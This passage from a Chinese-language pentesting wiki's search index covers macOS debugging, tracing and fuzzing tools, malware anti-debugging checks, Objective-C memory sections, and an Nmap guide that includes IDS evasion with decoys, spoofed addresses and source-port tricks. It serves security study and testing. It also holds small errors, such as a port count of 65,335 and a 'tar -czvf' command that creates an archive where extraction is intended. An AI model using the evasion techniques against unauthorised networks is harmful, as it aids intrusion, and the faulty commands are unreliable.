进行交互,通常步骤如下: 使用 KERN_KDSETREMOVE 移除现有设置 使用 KERN_KDSETBUF 和 KERN_KDSETUP 设置跟踪 使用 KERN_KDGETBUF 获取缓冲区条目数量 使用 KERN_KDPINDEX 从跟踪中获取自己的客户端 使用 KERN_KDENABLE 启用跟踪 调用 KERN_KDREADTR 读取缓冲区 要将每个线程与其进程匹配,调用 KERN_KDTHRMAP。 为了获取这些信息,可以使用 Apple 工具 trace 或自定义工具 kDebugView (kdv) 。 注意,Kdebug 仅对一个客户可用。 因此,只有一个 k-debug 驱动的工具可以同时执行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » kdebug","id":"2050","title":"kdebug"},"2051":{"body":"ktrace_* API 来自 libktrace.dylib,它封装了 Kdebug 的 API。然后,客户端可以直接调用 ktrace_session_create 和 ktrace_events_[single/class] 在特定代码上设置回调,然后使用 ktrace_start 启动它。 即使在 SIP 激活 的情况下也可以使用这个。 您可以使用实用程序 ktrace 作为客户端: bash ktrace trace -s -S -t c -c ls | grep \\"ls(\\" Or tailspin.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » ktrace","id":"2051","title":"ktrace"},"2052":{"body":"这用于进行内核级别的性能分析,使用 Kdebug 调用构建。 基本上,检查全局变量 kernel_debug_active,如果设置了它,则调用 kperf_kdebug_handler,并传入 Kdebug 代码和调用的内核帧地址。如果 Kdebug 代码与所选的匹配,则获取配置为位图的“操作”(查看 osfmk/kperf/action.h 以获取选项)。 Kperf 还有一个 sysctl MIB 表: (作为 root) sysctl kperf。这些代码可以在 osfmk/kperf/kperfbsd.c 中找到。 此外,Kperf 的一部分功能位于 kpc 中,提供有关机器性能计数器的信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » kperf","id":"2052","title":"kperf"},"2053":{"body":"ProcessMonitor 是一个非常有用的工具,用于检查进程相关的操作(例如,监视一个进程正在创建哪些新进程)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » ProcessMonitor","id":"2053","title":"ProcessMonitor"},"2054":{"body":"SpriteTree 是一个打印进程之间关系的工具。 您需要使用类似 sudo eslogger fork exec rename create > cap.json 的命令监视您的 Mac(启动此终端需要 FDA)。然后,您可以在此工具中加载 json 以查看所有关系:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » SpriteTree","id":"2054","title":"SpriteTree"},"2055":{"body":"FileMonitor 允许监视文件事件(例如创建、修改和删除),提供有关这些事件的详细信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » FileMonitor","id":"2055","title":"FileMonitor"},"2056":{"body":"Crescendo 是一个 GUI 工具,外观和感觉与 Windows 用户可能熟悉的 Microsoft Sysinternal 的 Procmon 相似。此工具允许开始和停止各种事件类型的记录,允许按文件、进程、网络等类别过滤这些事件,并提供以 json 格式保存记录事件的功能。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Crescendo","id":"2056","title":"Crescendo"},"2057":{"body":"Apple Instruments 是 Xcode 开发工具的一部分 – 用于监视应用程序性能、识别内存泄漏和跟踪文件系统活动。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Apple Instruments","id":"2057","title":"Apple Instruments"},"2058":{"body":"允许跟踪进程执行的操作: bash fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names containing ls\\nfs_usage -w -f network curl #This tracks network actions","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » fs_usage","id":"2058","title":"fs_usage"},"2059":{"body":"Taskexplorer 是一个有用的工具,可以查看二进制文件使用的 libraries 、它正在使用的 files 和 network 连接。 它还会检查二进制进程与 virustotal 的对比,并显示有关该二进制文件的信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » TaskExplorer","id":"2059","title":"TaskExplorer"},"206":{"body":"-p: 用于指定要扫描的端口。要选择所有 65,335 个端口: -p- 或 -p all 。Nmap 有一个基于流行度的内部分类。默认情况下,它使用前 1000 个端口。使用 -F (快速扫描)分析前 100 个。使用 --top-ports 分析该数量的前端口(从 1 到 65,335)。它以随机顺序检查端口;要防止这种情况,请使用 -r 。我们还可以选择特定端口:20-30,80,443,1024-(后者表示从 1024 开始查找)。我们还可以按协议对端口进行分组:U:53,T:21-25,80,139,S:9。我们还可以选择 Nmap 流行端口中的范围:-p [-1024] 分析到 1024 端口的所有端口,这些端口包含在 nmap-services 中。 --port-ratio 分析在 0 到 1 之间的比率内最常见的端口。 -sV 版本扫描,强度可以从 0 调整到 9,默认是 7。 --version-intensity 我们调节强度,越低只会发出最可能的探测,但不是全部。这样可以大大缩短 UDP 扫描时间。 -O 操作系统检测。 --osscan-limit 为了正确扫描主机,至少需要一个开放端口和一个关闭端口。如果未满足此条件且我们设置了此选项,则不会尝试 OS 预测(节省时间)。 --osscan-guess 当操作系统检测不完美时,这会使其更加努力。 脚本 --script | | | [,...] 要使用默认脚本,请使用 -sC 或 --script=default。 可用类型有:auth、broadcast、default、discovery、dos、exploit、external、fuzzer、intrusive、malware、safe、version 和 vuln。 Auth: 执行所有可用的身份验证脚本。 Default: 执行基本的默认工具脚本。 Discovery: 从目标或受害者处检索信息。 External: 使用外部资源的脚本。 Intrusive: 使用被认为对受害者或目标具有侵入性的脚本。 Malware: 检查恶意代码或后门打开的连接。 Safe: 执行非侵入性脚本。 Vuln: 发现最常见的漏洞。 All: 执行所有可用的 NSE 扩展脚本。 要搜索脚本: nmap --script-help=\\"http-*\\" -> 以 http- 开头的那些 nmap --script-help=\\"not intrusive\\" -> 除了那些 nmap --script-help=\\"default or safe\\" -> 其中任何一个或两个的那些 nmap --script-help=\\"default and safe\\" --> 两者都有的那些 nmap --script-help=\\"(default or safe or intrusive) and not http-*\\" --script-args = , ={ = }, ={ , } --script-args-file --script-help | | | |all[,...] --script-trace ---> 提供有关脚本进展的信息。 --script-updatedb 要使用脚本,只需输入: nmap --script Script_Name target --> 使用脚本时,脚本和扫描器都会执行,因此也可以添加扫描器选项。我们可以添加 \\"safe=1\\" 以仅执行安全的脚本。 时间控制 Nmap 可以修改时间为秒、分钟、毫秒: --host-timeout 参数 900000ms、900、900s 和 15m 都是相同的。 Nmap 将要扫描的主机总数分成组,并以块的方式分析这些组,因此在所有主机都被分析之前不会移动到下一个块(用户在块分析完成之前不会收到任何更新)。这样,Nmap 使用大组更为优化。默认情况下,在 C 类中,它使用 256。 这可以通过 --min-hostgroup ; --max-hostgroup (调整并行扫描组大小)来更改。 您可以控制并行扫描器的数量,但最好不要这样做(Nmap 已根据网络状态自动控制): --min-parallelism ; --max-parallelism 。 我们可以修改 RTT 超时,但通常没有必要: --min-rtt-timeout , --max-rtt-timeout , --initial-rtt-timeout 。 我们可以修改尝试次数: --max-retries 。 我们可以修改主机的扫描时间: --host-timeout 。 我们可以修改每次测试之间的时间以减慢速度: --scan-delay ; --max-scan-delay 。 我们可以修改每秒的数据包数量: --min-rate ; --max-rate 。 许多端口在被过滤或关闭时响应时间较长。如果我们只对开放端口感兴趣,可以通过以下方式加快速度: --defeat-rst-ratelimit 。 要定义 Nmap 的攻击性:-T paranoid|sneaky|polite|normal|aggressive|insane。 -T (0-1) -T0 --> 仅扫描 1 个端口,并在下一个端口之前等待 5 分钟。 -T1 和 T2 --> 非常相似,但在每次测试之间仅等待 15 和 0.4 秒。 -T3 --> 默认操作,包括并行扫描。 -T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms。 -T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms。 防火墙/IDS 它们不允许访问端口并分析数据包。 -f 用于分割数据包,默认将其分割为 8 字节,位于报头之后,要指定该大小,我们使用 ..mtu(使用此选项时,不要使用 -f),偏移量必须是 8 的倍数。 版本扫描器和脚本不支持分片 。 -D decoy1,decoy2,ME Nmap 发送扫描器,但使用其他 IP 地址作为来源,这样可以隐藏你。如果在列表中放入 ME,Nmap 会将你放在那里,最好在你之前放 5 或 6 个以完全掩盖你。可以使用 RND: 生成随机 IP。生成 个随机 IP。它们在没有连接的 TCP 版本检测器中不起作用。如果你在网络内部,使用活动 IP 会更有利,因为否则很容易发现你是唯一的活动者。 要使用随机 IP:nmap -D RND:10 Target_IP。 -S IP 当 Nmap 无法捕获你的 IP 地址时,你必须使用此选项提供它。也用于让他们认为另一个目标正在扫描他们。 -e 用于选择接口。 许多管理员为所有内容开放入口端口,以便一切正常工作,这比寻找其他解决方案更容易。这些可以是 DNS 端口或 FTP 端口...要找到此漏洞,Nmap 包含: --source-port ;-g 它们是等效的 。 --data 发送十六进制文本:--data 0xdeadbeef 和 --data \\\\xCA\\\\xFE\\\\x09。 --data-string 发送普通文本:--data-string \\"由安全操作进行的扫描,分机 7192\\"。 --data-length Nmap 仅发送报头,通过此选项我们可以添加更多字节(将随机生成)。 要完全配置 IP 数据包,请使用 --ip-options 。 如果希望查看发送和接收的数据包中的选项,请指定 --packet-trace。有关使用 IP 选项与 Nmap 的更多信息和示例,请参见 http://seclists.org/nmap-dev/2006/q3/52 。 --ttl 。 --randomize-hosts 使攻击不那么明显。 --spoof-mac 更改 MAC 示例:Apple、0、01:02:03:04:05:06、deadbeefcafe、0020F2 和 Cisco。 --proxies 使用代理,有时代理不会保持与 Nmap 想要的那么多开放连接,因此需要修改并行性:--max-parallelism。 -sP 通过 ARP 发现我们网络中的主机。 许多管理员创建防火墙规则,允许来自特定端口的所有数据包通过(如 20、53 和 67),我们可以告诉 Nmap 从这些端口发送我们的数据包: nmap --source-port 53 IP 。 输出 -oN file 正常输出。 -oX file XML 输出。 -oS file 脚本小子输出。 -oG file 可抓取输出。 -oA file 除 -oS 外的所有输出。 -v level 详细程度。 -d level 调试。 --reason 主机和状态的原因。 --stats-every time 每次告诉我们进展如何。 --packet-trace 查看哪些数据包出去,可以指定过滤器,如:--version-trace 或 --script-trace。 --open 显示开放、开放|过滤和未过滤。 --resume file 输出摘要。 其他 -6 允许 IPv6。 -A 等同于 -O -sV -sC --traceroute。 运行时 在 Nmap 运行时,我们可以更改选项: v / V 增加 / 减少详细程度。 d / D 增加 / 减少调试级别。 p / P 开启 / 关闭数据包跟踪。 ? 打印运行时交互帮助屏幕。 Vulscan Nmap 脚本查看在离线数据库中获得的服务版本(从其他非常重要的地方下载)并返回可能的漏洞。 它使用的数据库有: Scipvuldb.csv | http://www.scip.ch/en/?vuldb Cve.csv | http://cve.mitre.org Osvdb.csv | http://www.osvdb.org Securityfocus.csv | http://www.securityfocus.com/bid/ Securitytracker.csv | http://www.securitytracker.com Xforce.csv | http://xforce.iss.net Exploitdb.csv | http://www.exploit-db.com Openvas.csv | http://www.openvas.org 要下载并安装在 Nmap 文件夹中: wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar -czvf nmap_nse_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/ 您还需要下载数据库包并将其添加到 /usr/share/nmap/scripts/vulscan/。 用法: 要使用所有:sudo nmap -sV --script=vulscan HOST_TO_SCAN。 要使用特定数据库:sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST_TO_SCAN。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 重点分析","id":"206","title":"重点分析"},"2060":{"body":"在 这篇博客文章 中,你可以找到一个关于如何 debug a running daemon 的示例,该守护进程使用 PT_DENY_ATTACH 来防止调试,即使 SIP 被禁用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » PT_DENY_ATTACH","id":"2060","title":"PT_DENY_ATTACH"},"2061":{"body":"lldb 是 macOS 二进制 debugging 的事实标准工具。 bash lldb ./malware.bin\\nlldb -p 1122\\nlldb -n malware.bin\\nlldb -n malware.bin --waitfor 您可以在使用 lldb 时设置 intel 风味,通过在您的主文件夹中创建一个名为 .lldbinit 的文件,并添加以下行: bash settings set target.x86-disassembly-flavor intel warning 在 lldb 中,使用 process save-core 转储进程 (lldb) 命令描述run (r)开始执行,直到命中断点或进程终止。process launch --stop-at-entry在入口点停止执行continue (c)继续调试进程的执行。nexti (n / ni)执行下一条指令。此命令将跳过函数调用。stepi (s / si)执行下一条指令。与 nexti 命令不同,此命令将进入函数调用。finish (f)执行当前函数(“帧”)中的其余指令,返回并停止。control + c暂停执行。如果进程已运行 (r) 或继续 (c),这将导致进程在当前执行位置停止。breakpoint (b)b main #任何名为 main 的函数b `main #二进制文件的主函数b set -n main --shlib #指定二进制文件的主函数breakpoint set -r \'\\\\[NSFileManager .*\\\\]$\' #任何 NSFileManager 方法breakpoint set -r \'\\\\[NSFileManager contentsOfDirectoryAtPath:.*\\\\]$\'break set -r . -s libobjc.A.dylib # 在该库的所有函数中断b -a 0x0000000100004bd9br l #断点列表br e/dis #启用/禁用断点breakpoint delete helphelp breakpoint #获取断点命令的帮助help memory write #获取写入内存的帮助regreg readreg read $raxreg read $rax --format <format>reg write $rip 0x100035cc0x/s 将内存显示为以 null 结尾的字符串。x/i 将内存显示为汇编指令。x/b 将内存显示为字节。print object (po)这将打印由参数引用的对象po $raw{dnsChanger = {\\"affiliate\\" = \\"\\";\\"blacklist_dns\\" = ();请注意,Apple 的大多数 Objective-C API 或方法返回对象,因此应通过“打印对象”(po)命令显示。如果 po 没有产生有意义的输出,请使用 x/bmemorymemory read 0x000....memory read $x0+0xf2amemory write 0x100600000 -s 4 0x41414141 #在该地址写入 AAAAmemory write -f s $rip+0x11f+7 \\"AAAA\\" #在地址中写入 AAAAdisassemblydis #反汇编当前函数dis -n #反汇编函数dis -n -b #反汇编函数dis -c 6 #反汇编 6 行dis -c 0x100003764 -e 0x100003768 # 从一个地址到另一个地址dis -p -c 4 # 从当前地址开始反汇编parrayparray 3 (char **)$x1 # 检查 x1 寄存器中的 3 个组件的数组image dump sections打印当前进程内存的映射image dump symtab image dump symtab CoreNLP #获取 CoreNLP 的所有符号的地址 tip 调用 objc_sendMsg 函数时, rsi 寄存器保存方法的名称,作为以 null 结尾的(“C”)字符串。要通过 lldb 打印名称,请执行: (lldb) x/s $rsi: 0x1000f1576: \\"startMiningWithPort:password:coreCount:slowMemory:currency:\\" (lldb) print (char*)$rsi: (char *) $1 = 0x00000001000f1576 \\"startMiningWithPort:password:coreCount:slowMemory:currency:\\" (lldb) reg read $rsi: rsi = 0x00000001000f1576 \\"startMiningWithPort:password:coreCount:slowMemory:currency:\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » lldb","id":"2061","title":"lldb"},"2062":{"body":"虚拟机检测 命令 sysctl hw.model 在 主机为 MacOS 时返回 \\"Mac\\",但在虚拟机中返回不同的内容。 一些恶意软件通过玩弄 hw.logicalcpu 和 hw.physicalcpu 的值来检测是否为虚拟机。 一些恶意软件还可以根据 MAC 地址(00:50:56) 检测 机器是否基于 VMware 。 也可以通过简单的代码检查 进程是否正在被调试 : if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //进程正在被调试 } 它还可以调用 ptrace 系统调用,使用 PT_DENY_ATTACH 标志。这 防止 调试器附加和跟踪。 您可以检查 sysctl 或 ptrace 函数是否被 导入 (但恶意软件可能会动态导入它) 正如在这篇文章中所述,“ 击败反调试技术:macOS ptrace 变体 ”: “ 消息 Process # exited with status = 45 (0x0000002d) 通常是调试目标使用 PT_DENY_ATTACH 的明显迹象 ”","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 反动态分析","id":"2062","title":"反动态分析"},"2063":{"body":"核心转储在以下情况下创建: kern.coredump sysctl 设置为 1(默认值) 如果进程不是 suid/sgid 或 kern.sugid_coredump 为 1(默认值为 0) AS_CORE 限制允许该操作。可以通过调用 ulimit -c 0 来抑制核心转储的创建,并通过 ulimit -c unlimited 重新启用它们。 在这些情况下,核心转储根据 kern.corefile sysctl 生成,通常存储在 /cores/core/.%P 中。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 核心转储","id":"2063","title":"核心转储"},"2064":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 模糊测试","id":"2064","title":"模糊测试"},"2065":{"body":"ReportCrash 分析崩溃的进程并将崩溃报告保存到磁盘 。崩溃报告包含可以 帮助开发人员诊断 崩溃原因的信息。 对于在每个用户 launchd 上下文中 运行的应用程序和其他进程 ,ReportCrash 作为 LaunchAgent 运行,并将崩溃报告保存在用户的 ~/Library/Logs/DiagnosticReports/ 中。 对于守护进程、在系统 launchd 上下文中 运行的其他进程 和其他特权进程,ReportCrash 作为 LaunchDaemon 运行,并将崩溃报告保存在系统的 /Library/Logs/DiagnosticReports 中。 如果您担心崩溃报告 被发送到 Apple ,可以禁用它们。如果不担心,崩溃报告可以帮助 找出服务器崩溃的原因 。 bash #To disable crash reporting:\\nlaunchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist\\nsudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist #To re-enable crash reporting:\\nlaunchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist\\nsudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » ReportCrash","id":"2065","title":"ReportCrash"},"2066":{"body":"在 MacOS 中进行模糊测试时,重要的是不要让 Mac 进入睡眠状态: systemsetup -setsleep Never pmset, 系统偏好设置 KeepingYouAwake SSH 断开连接 如果您通过 SSH 连接进行模糊测试,确保会话不会断开是很重要的。因此,请使用以下内容更改 sshd_config 文件: TCPKeepAlive Yes ClientAliveInterval 0 ClientAliveCountMax 0 bash sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist\\nsudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 睡眠","id":"2066","title":"睡眠"},"2067":{"body":"查看以下页面 以了解如何找到哪个应用程序负责 处理指定的方案或协议: macOS File Extension & URL scheme app handlers","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Internal Handlers","id":"2067","title":"Internal Handlers"},"2068":{"body":"这对于查找管理网络数据的进程很有趣: bash dtrace -n \'syscall::recv*:entry { printf(\\"-> %s (pid=%d)\\", execname, pid); }\' >> recv.log\\n#wait some time\\nsort -u recv.log > procs.txt\\ncat procs.txt 或者使用 netstat 或 lsof","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Enumerating Network Processes","id":"2068","title":"Enumerating Network Processes"},"2069":{"body":"bash lldb -o \\"target create `which some-binary`\\" -o \\"settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib\\" -o \\"run arg1 arg2\\" -o \\"bt\\" -o \\"reg read\\" -o \\"dis -s \\\\$pc-32 -c 24 -m -F intel\\" -o \\"quit\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Libgmalloc","id":"2069","title":"Libgmalloc"},"207":{"body":"根据 这篇文章 ,您可以通过将 /usr/share/nmap/nmap-service-probes 中的所有 totalwaitms 值修改为 300 和 tcpwrappedms 修改为 200 来加速 nmap 服务分析。 此外,未特别定义 servicewaitms 的探测使用默认值 5000 。因此,我们可以为每个探测添加值,或者我们可以 自己编译 nmap 并在 service_scan.h 中更改默认值。 如果您不想在 /usr/share/nmap/nmap-service-probes 文件中更改 totalwaitms 和 tcpwrappedms 的值,可以编辑 解析代码 ,使得 nmap-service-probes 文件中的这些值被完全忽略。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 加速 Nmap 服务扫描 x16","id":"207","title":"加速 Nmap 服务扫描 x16"},"2070":{"body":"AFL++ 适用于CLI工具 Litefuzz 它“ 可以正常工作 ”与macOS GUI工具。注意一些macOS应用程序有一些特定要求,如唯一的文件名、正确的扩展名,需要从沙盒中读取文件(~/Library/Containers/com.apple.Safari/Data)... 一些示例: bash # iBooks\\nlitefuzz -l -c \\"/System/Applications/Books.app/Contents/MacOS/Books FUZZ\\" -i files/epub -o crashes/ibooks -t /Users/test/Library/Containers/com.apple.iBooksX/Data/tmp -x 10 -n 100000 -ez # -l : Local\\n# -c : cmdline with FUZZ word (if not stdin is used)\\n# -i : input directory or file\\n# -o : Dir to output crashes\\n# -t : Dir to output runtime fuzzing artifacts\\n# -x : Tmeout for the run (default is 1)\\n# -n : Num of fuzzing iterations (default is 1)\\n# -e : enable second round fuzzing where any crashes found are reused as inputs\\n# -z : enable malloc debug helpers # Font Book\\nlitefuzz -l -c \\"/System/Applications/Font Book.app/Contents/MacOS/Font Book FUZZ\\" -i input/fonts -o crashes/font-book -x 2 -n 500000 -ez # smbutil (using pcap capture)\\nlitefuzz -lk -c \\"smbutil view smb://localhost:4455\\" -a tcp://localhost:4455 -i input/mac-smb-resp -p -n 100000 -z # screensharingd (using pcap capture)\\nlitefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash screensharingd -p -n 100000","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Fuzzers","id":"2070","title":"Fuzzers"},"2071":{"body":"https://www.youtube.com/watch?v=T5xfL9tEg44 https://github.com/bnagy/slides/blob/master/OSXScale.pdf https://github.com/bnagy/francis/tree/master/exploitaben https://github.com/ant4g0nist/crashwrangler","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 更多模糊测试 MacOS 信息","id":"2071","title":"更多模糊测试 MacOS 信息"},"2072":{"body":"OS X 事件响应:脚本和分析 https://www.youtube.com/watch?v=T5xfL9tEg44 https://taomm.org/vol1/analysis.html Mac 恶意软件的艺术:分析恶意软件的指南 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 参考文献","id":"2072","title":"参考文献"},"2073":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 内存中的对象","id":"2073","title":"内存中的对象"},"2074":{"body":"CF* 对象来自 CoreFoundation,后者提供了超过 50 种对象类,例如 CFString、CFNumber 或 CFAllocator。 所有这些类都是类 CFRuntimeClass 的实例,其在被调用时会返回 __CFRuntimeClassTable 的索引。CFRuntimeClass 在 CFRuntime.h 中定义: objectivec // Some comments were added to the original code enum { // Version field constants\\n_kCFRuntimeScannedObject = (1UL << 0),\\n_kCFRuntimeResourcefulObject = (1UL << 2), // tells CFRuntime to make use of the reclaim field\\n_kCFRuntimeCustomRefCount = (1UL << 3), // tells CFRuntime to make use of the refcount field\\n_kCFRuntimeRequiresAlignment = (1UL << 4), // tells CFRuntime to make use of the requiredAlignment field\\n}; typedef struct __CFRuntimeClass {\\nCFIndex version; // This is made a bitwise OR with the relevant previous flags const char *className; // must be a pure ASCII string, nul-terminated\\nvoid (*init)(CFTypeRef cf); // Initializer function\\nCFTypeRef (*copy)(CFAllocatorRef allocator, CFTypeRef cf); // Copy function, taking CFAllocatorRef and CFTypeRef to copy\\nvoid (*finalize)(CFTypeRef cf); // Finalizer function\\nBoolean (*equal)(CFTypeRef cf1, CFTypeRef cf2); // Function to be called by CFEqual()\\nCFHashCode (*hash)(CFTypeRef cf); // Function to be called by CFHash()\\nCFStringRef (*copyFormattingDesc)(CFTypeRef cf, CFDictionaryRef formatOptions); // Provides a CFStringRef with a textual description of the object// return str with retain\\nCFStringRef (*copyDebugDesc)(CFTypeRef cf);\\t// CFStringRed with textual description of the object for CFCopyDescription #define CF_RECLAIM_AVAILABLE 1\\nvoid (*reclaim)(CFTypeRef cf); // Or in _kCFRuntimeResourcefulObject in the .version to indicate this field should be used\\n// It not null, it\'s called when the last reference to the object is released #define CF_REFCOUNT_AVAILABLE 1\\n// If not null, the following is called when incrementing or decrementing reference count\\nuint32_t (*refcount)(intptr_t op, CFTypeRef cf); // Or in _kCFRuntimeCustomRefCount in the .version to indicate this field should be used\\n// this field must be non-NULL when _kCFRuntimeCustomRefCount is in the .version field\\n// - if the callback is passed 1 in \'op\' it should increment the \'cf\'s reference count and return 0\\n// - if the callback is passed 0 in \'op\' it should return the \'cf\'s reference count, up to 32 bits\\n// - if the callback is passed -1 in \'op\' it should decrement the \'cf\'s reference count; if it is now zero, \'cf\' should be cleaned up and deallocated (the finalize callback above will NOT be called unless the process is running under GC, and CF does not deallocate the memory for you; if running under GC, finalize should do the object tear-down and free the object memory); then return 0\\n// remember to use saturation arithmetic logic and stop incrementing and decrementing when the ref count hits UINT32_MAX, or you will have a security bug\\n// remember that reference count incrementing/decrementing must be done thread-safely/atomically\\n// objects should be created/initialized with a custom ref-count of 1 by the class creation functions\\n// do not attempt to use any bits within the CFRuntimeBase for your reference count; store that in some additional field in your CF object #pragma GCC diagnostic push\\n#pragma GCC diagnostic ignored \\"-Wmissing-field-initializers\\"\\n#define CF_REQUIRED_ALIGNMENT_AVAILABLE 1\\n// If not 0, allocation of object must be on this boundary\\nuintptr_t requiredAlignment; // Or in _kCFRuntimeRequiresAlignment in the .version field to indicate this field should be used; the allocator to _CFRuntimeCreateInstance() will be ignored in this case; if this is less than the minimum alignment the system supports, you\'ll get higher alignment; if this is not an alignment the system supports (e.g., most systems will only support powers of two, or if it is too high), the result (consequences) will be up to CF or the system to decide } CFRuntimeClass;","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » CFRuntimeClass","id":"2074","title":"CFRuntimeClass"},"2075":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Objective-C","id":"2075","title":"Objective-C"},"2076":{"body":"Most of the data used by Objective‑C runtime will change during execution, therefore it uses a number of sections from the Mach‑O __DATA family of segments in memory. Historically these included: __objc_msgrefs (message_ref_t): 消息引用 __objc_ivar (ivar): 实例变量 __objc_data (...): 可变数据 __objc_classrefs (Class): 类引用 __objc_superrefs (Class): 超类引用 __objc_protorefs (protocol_t *): 协议引用 __objc_selrefs (SEL): selector 引用 __objc_const (...): 类只读数据和其他(希望是)常量数据 __objc_imageinfo (version, flags): 在镜像加载期间使用:当前 Version 为 0;Flags 指定预优化的 GC 支持等 __objc_protolist (protocol_t *): 协议列表 __objc_nlcatlist (category_t): 指向此二进制中定义的 Non-Lazy Categories 的指针 __objc_catlist (category_t): 指向此二进制中定义的 Categories 的指针 __objc_nlclslist (classref_t): 指向此二进制中定义的 Non-Lazy Objective‑C classes 的指针 __objc_classlist (classref_t): 指向此二进制中定义的所有 Objective‑C classes 的指针 它还使用 __TEXT 段中的几个节来存储常量: __objc_methname (C‑String): 方法名 __objc_classname (C‑String): 类名 __objc_methtype (C‑String): 方法类型 现代 macOS/iOS(尤其是 Apple Silicon 上)还将 Objective‑C/Swift 元数据放在: __DATA_CONST: 不可变的 Objective‑C 元数据,可以跨进程以只读方式共享(例如许多 __objc_* 列表现在存放在这里)。 __AUTH / __AUTH_CONST: 包含在 arm64e 上于加载或使用时必须进行认证的指针(Pointer Authentication)的段。你还会在 __AUTH_CONST 中看到 __auth_got,而不是仅有的传统 __la_symbol_ptr/__got。在进行 instrumenting 或 hooking 时,记得要同时考虑现代二进制中的 __got 和 __auth_got 条目。 For background on dyld pre‑optimization (e.g., selector uniquing and class/protocol precomputation) and why many of these sections are \\"already fixed up\\" when coming from the shared cache, check the Apple objc-opt sources and dyld shared cache notes. This affects where and how you can patch metadata at runtime. macOS Universal binaries & Mach-O Format","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Memory sections used","id":"2076","title":"Memory sections used"},"2077":{"body":"Objective‑C uses mangling to encode selector and variable types of simple and complex types: 